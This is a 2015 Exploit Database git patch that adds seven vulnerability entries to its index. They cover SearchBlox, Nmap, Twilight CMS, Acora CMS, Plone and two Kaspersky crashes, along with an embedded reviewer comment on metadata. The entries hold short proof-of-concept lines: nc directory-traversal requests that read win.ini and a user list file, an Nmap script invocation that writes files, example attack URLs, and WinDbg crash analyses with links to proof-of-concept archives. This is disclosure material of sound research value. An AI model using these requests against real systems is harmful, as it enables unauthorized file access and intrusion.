From 95a1b072fe4a544882902e03a30971992c23c059 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 18 Nov 2015 05:02:21 +0000
Subject: [PATCH] DB: 2015-11-18 7 new exploits
---
files.csv | 13 +++-
platforms/java/webapps/38739.txt | 9 +++
platforms/linux/remote/38741.txt | 9 +++
platforms/php/webapps/38737.txt | 14 ++++
platforms/php/webapps/38740.txt | 9 +++
platforms/python/webapps/38738.txt | 9 +++
platforms/windows/dos/38735.txt | 39 +++++++++++
platforms/windows/dos/38736.txt | 103 +++++++++++++++++++++++++++++
8 files changed, 202 insertions(+), 3 deletions(-)
create mode 100755 platforms/java/webapps/38739.txt
create mode 100755 platforms/linux/remote/38741.txt
create mode 100755 platforms/php/webapps/38737.txt
create mode 100755 platforms/php/webapps/38740.txt
create mode 100755 platforms/python/webapps/38738.txt
create mode 100755 platforms/windows/dos/38735.txt
create mode 100755 platforms/windows/dos/38736.txt
diff --git a/files.csv b/files.csv
index 77ab61b8e..72b4a9ff9 100755
--- a/files.csv
+++ b/files.csv
@@ -32058,7 +32058,7 @@ id,file,description,date,author,platform,type,port
 35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 - 'cms.php' Remote File Include Vulnerability",2011-04-08,KedAns-Dz,php,webapps,0
 35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting Vulnerability",2011-04-07,"kurdish hackers team",asp,webapps,0
 35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting Vulnerability",2011-04-07,"AutoSec Tools",php,webapps,0
-35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection Exploit",2014-12-19,Wireghoul,php,webapps,0
+35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - RCE (LFI) via SQL Injection Exploit",2014-12-19,Wireghoul,php,webapps,0
 35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0
 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082
@@ -34913,8 +34913,8 @@ id,file,description,date,author,platform,type,port
 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface Information Disclosure Vulnerability",2013-07-02,"Dan Farmer",multiple,remote,0
 38634,platforms/ios/remote/38634.txt,"Air Drive Plus Multiple Input Vallidation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0
 38635,platforms/php/webapps/38635.txt,"iVote 'details.php' SQL Injection Vulnerability",2013-07-10,"Ashiyane Digital Security Team",php,webapps,0
-38636,platforms/multiple/remote/38636.txt,"Cryptocat Chrome Extension 'img/keygen.gif' File Information Disclosure Vulnerability",2012-11-07,"Mario Heiderich",multiple,remote,0
-38637,platforms/multiple/remote/38637.txt,"Cryptocat Arbitrary Script Injection Vulnerability",2015-11-07,"Mario Heiderich",multiple,remote,0
+38636,platforms/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure Vulnerability",2012-11-07,"Mario Heiderich",multiple,remote,0
+38637,platforms/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection Vulnerability",2012-11-07,"Mario Heiderich",multiple,remote,0
 38638,platforms/php/webapps/38638.txt,"Mintboard Multiple Cross Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps,0
 38639,platforms/php/webapps/38639.txt,"miniBB SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0
 38640,platforms/multiple/webapps/38640.rb,"OpenSSL Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0
@@ -35006,3 +35006,10 @@ id,file,description,date,author,platform,type,port
 38732,platforms/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload",2015-11-16,metasploit,php,remote,9999
 38733,platforms/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload",2015-11-16,metasploit,php,remote,9999
 38734,platforms/windows/dos/38734.txt,"Kaspersky Antivirus - Certificate Handling Path Traversal",2015-11-16,"Google Security Research",windows,dos,0
+38735,platforms/windows/dos/38735.txt,"Kaspersky Antivirus - DEX File Format Memory Corruption",2015-11-16,"Google Security Research",windows,dos,0
+38736,platforms/windows/dos/38736.txt,"Kaspersky Antivirus - ZIP File Format Use-After-Free Vulnerability",2015-11-16,"Google Security Research",windows,dos,0
+38737,platforms/php/webapps/38737.txt,"Twilight CMS DeWeS Web Server Directory Traversal Vulnerability",2013-08-21,"High-Tech Bridge",php,webapps,0
+38738,platforms/python/webapps/38738.txt,"Plone 'in_portal.py' <= 4.1.3 Session Hijacking Vulnerability",2013-07-31,"Cyrill Bannwart",python,webapps,0
+38739,platforms/java/webapps/38739.txt,"SearchBlox Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0
+38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS 'top.aspx' Information Disclosure Vulnerability",2013-08-26,"Pedro Andujar",php,webapps,0
+38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write Vulnerability",2013-08-06,"Piotr Duszynski",linux,remote,0
diff --git a/platforms/java/webapps/38739.txt b/platforms/java/webapps/38739.txt
new file mode 100755
index 000000000..e9b9d6dc8
--- /dev/null
+++ b/platforms/java/webapps/38739.txt
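Review bot: The platform column of two new rows does not match the file they index: 38740 is filed as `php` although the page it names is `top.aspx` (the `asp` value already used for 35576 in the first hunk looks like the right fit), and the proof of concept added in 38737.txt reads `/windows/win.ini`, so `php` looks doubtful for 38737 as well; correcting either row also means moving the file out of `platforms/php/`. The 38738 description asserts `'in_portal.py' <= 4.1.3`, but the advisory text added in 38738.txt names neither that file nor any version, so the row carries a claim the entry itself does not support. For 38736 the debugger output in 38736.txt shows the affected build (`Kaspersky Internet Security 15.0.2`, `prcore.dll`), which the description `Kaspersky Antivirus - ZIP File Format Use-After-Free Vulnerability` could include so the entry can be found by product and version.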
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/61974/info
+
+SearchBlox is prone to multiple information-disclosure vulnerabilities.
+
+Attackers can exploit these issues to obtain sensitive information that may aid in launching further attacks.
+
+SearchBlox 7.4 Build 1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/searchblox/servlet/CollectionListServlet?action=getList&orderBy=colName&direction=asc
\ No newline at end of file
diff --git a/platforms/linux/remote/38741.txt b/platforms/linux/remote/38741.txt
new file mode 100755
index 000000000..102a642bc
--- /dev/null
+++ b/platforms/linux/remote/38741.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/62024/info
+
+Nmap is prone to an arbitrary file-write vulnerability.
+
+An attacker can exploit this issue to write arbitrary files with the permissions of the user running the nmap client. This will allow the attacker to fully compromise the affected machine.
+
+Nmap 6.25 is vulnerable; other versions may also be affected.
+
+nmap --script domino-enum-passwords -p 80 --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret,domino-enum-passwords.idpath='/tmp'
\ No newline at end of file
diff --git a/platforms/php/webapps/38737.txt b/platforms/php/webapps/38737.txt
new file mode 100755
index 000000000..2fe8587be
--- /dev/null
+++ b/platforms/php/webapps/38737.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/61906/info
+
+Twilight CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
+
+Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
+
+Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
+
+Twilight CMS 0.4.2 is vulnerable; other versions may also be affected.
+
+nc [www.example.com] 80 GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
+
+nc [www.example.com] 80 GET demosite/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/TwilightCMS/Sites/company_site/Data/user list.dat HTTP/1.1
+
diff --git a/platforms/php/webapps/38740.txt b/platforms/php/webapps/38740.txt
new file mode 100755
index 000000000..98d96b601
--- /dev/null
+++ b/platforms/php/webapps/38740.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/62010/info
+
+cm3 Acora CMS is prone to an information-disclosure vulnerability.
+
+Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks.
+
+http://www.example.com/AcoraCMS/Admin/top.aspx
+
+
\ No newline at end of file
diff --git a/platforms/python/webapps/38738.txt b/platforms/python/webapps/38738.txt
new file mode 100755
index 000000000..ffd6f5bf3
--- /dev/null
+++ b/platforms/python/webapps/38738.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/61964/info
+
+Plone is prone to a session-hijacking vulnerability.
+
+An attacker can exploit this issue to hijack user sessions and gain unauthorized access to the affected application.
+
+Note: This issue was previously discussed in the BID 61544 (Plone Multiple Remote Security Vulnerabilities), but has been moved to its own record to better document it.
+
+https://www.example.com/acl_users/credentials_cookie_auth/require_login?next=+https%3A//www.csnc.ch
\ No newline at end of file
diff --git a/platforms/windows/dos/38735.txt b/platforms/windows/dos/38735.txt
new file mode 100755
index 000000000..46f0c7e84
--- /dev/null
+++ b/platforms/windows/dos/38735.txt
@@ -0,0 +1,39 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=529
+
+The attached testcase was found by fuzzing DEX files, and results in a heap overflow with a wild memcpy. Note that Kaspersky catch exceptions and continue execution, so running into unmapped pages doesn't terminate the process, this should make exploitation quite realistic.
+
+(bb8.ac0): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=0c0b2074 ebx=ffffffff ecx=3ffd419c edx=00000003 esi=0c161a01 edi=0c170000
+eip=72165157 esp=046ceed8 ebp=046ceee0 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
+avengine_dll!ekaGetObjectFactory+0x51537:
+72165157 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
+0:023> dd edi
+0c170000 ???????? ???????? ???????? ????????
+0c170010 ???????? ???????? ???????? ????????
+0c170020 ???????? ???????? ???????? ????????
+0c170030 ???????? ???????? ???????? ????????
+0c170040 ???????? ???????? ???????? ????????
+0c170050 ???????? ???????? ???????? ????????
+0c170060 ???????? ???????? ???????? ????????
+0c170070 ???????? ???????? ???????? ????????
+0:023> dd esi
+0c161a01 00000000 00000000 00000000 00000000
+0c161a11 00000000 00000000 00000000 00000000
+0c161a21 00000000 00000000 00000000 00000000
+0c161a31 00000000 00000000 00000000 00000000
+0c161a41 00000000 00000000 00000000 00000000
+0c161a51 00000000 00000000 00000000 00000000
+0c161a61 00000000 00000000 00000000 00000000
+0c161a71 00000000 00000000 00000000 00000000
+0:023> kvn1
+ # ChildEBP RetAddr Args to Child
+00 046ceee0 15c01af7 0c0c0674 0c0b2075 ffffffff avengine_dll!ekaGetObjectFactory+0x51537
+
+This vulnerability is exploitable for remote code execution as NT AUTHORITY\SYSTEM.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38735.zip
+
diff --git a/platforms/windows/dos/38736.txt b/platforms/windows/dos/38736.txt
new file mode 100755
index 000000000..be0f9e55d
--- /dev/null
+++ b/platforms/windows/dos/38736.txt
@@ -0,0 +1,103 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=521
+
+Fuzzing the ZIP file format found multiple memory corruption issues, some of which are obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM on any system with Kaspersky Antivirus.
+
+This testcase should fault by jumping to an unmapped address
+
+(aac.fa4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=cccccccc ebx=00000000 ecx=01bc2974 edx=73a10002 esi=02e0a598 edi=5b2266bb
+eip=cccccccc esp=05dde330 ebp=05dde354 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
+cccccccc ?? ???
+
+# where did that come from?
+
+0:036> kvn 2
+ # ChildEBP RetAddr Args to Child
+00 05dde32c 739fd847 02e0a598 05dde370 00000000 0xcccccccc
+01 05dde354 739fe438 01bc2974 002266bb 05dde370 prcore!PragueUnload+0x2687
+
+0:036> ub 739fd847 L9
+prcore!PragueUnload+0x2673:
+739fd833 8b4d08 mov ecx,dword ptr [ebp+8]
+739fd836 8b7104 mov esi,dword ptr [ecx+4]
+739fd839 8975ec mov dword ptr [ebp-14h],esi
+739fd83c 85f6 test esi,esi
+739fd83e 740a je prcore!PragueUnload+0x268a (739fd84a)
+739fd840 8b16 mov edx,dword ptr [esi]
+739fd842 8b02 mov eax,dword ptr [edx]
+739fd844 56 push esi
+739fd845 ffd0 call eax
+
+# that pointer is in edx
+
+0:088> dd edx
+739a0002 cccccccc cccccccc cccccccc 8b55cccc
+739a0012 77e95dec ccffffff cccccccc 8b55cccc
+739a0022 0c4d8bec 8b04418b 42390855 501a7504
+739a0032 0a8b018b d3e85150 83fffff9 c0850cc4
+739a0042 01b80775 5d000000 5dc033c3 8b55ccc3
+739a0052 0c4d8bec 8b04418b 42390855 501a7504
+739a0062 0a8b018b 63e85150 83fffff9 c0850cc4
+739a0072 01b80775 5d000000 5dc033c3 6c83ccc3
+
+# So what is that?
+
+0:088> !address edx
+Usage: Image
+Base Address: 73971000
+End Address: 739aa000
+Region Size: 00039000
+State: 00001000 MEM_COMMIT
+Protect: 00000020 PAGE_EXECUTE_READ
+Type: 01000000 MEM_IMAGE
+Allocation Base: 73970000
+Allocation Protect: 00000080 PAGE_EXECUTE_WRITECOPY
+Image Path: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.2\prcore.dll
+Module Name: prcore
+Loaded Image Name: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.2\prcore.dll
+Mapped Image Name:
+0:088> !chkimg prcore
+0 errors : prcore
+
+# Hmm, so why is esi pointing there?
+
+0:088> !address esi
+
+Mapping file section regions...
+Mapping module regions...
+Mapping PEB regions...
+Mapping TEB and stack regions...
+Mapping heap regions...
+Mapping page heap regions...
+Mapping other regions...
+Mapping stack trace database regions...
+Mapping activation context regions...
+
+
+Usage: Heap
+Base Address: 02a00000
+End Address: 02c33000
+Region Size: 00233000
+State: 00001000 MEM_COMMIT
+Protect: 00000004 PAGE_READWRITE
+Type: 00020000 MEM_PRIVATE
+Allocation Base: 02a00000
+Allocation Protect: 00000004 PAGE_READWRITE
+More info: heap owning the address: !heap 0x4a0000
+More info: heap segment
+More info: heap entry containing the address: !heap -x 0x2bf4760
+
+
+0:088> !heap -x 0x2bf4760
+Entry User Heap Segment Size PrevSize Unused Flags
+-----------------------------------------------------------------------------
+02bf4758 02bf4760 004a0000 02b00ac8 60 - 0 LFH;free
+
+# So looks like an exploitable use after free vulnerability.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38736.zip
+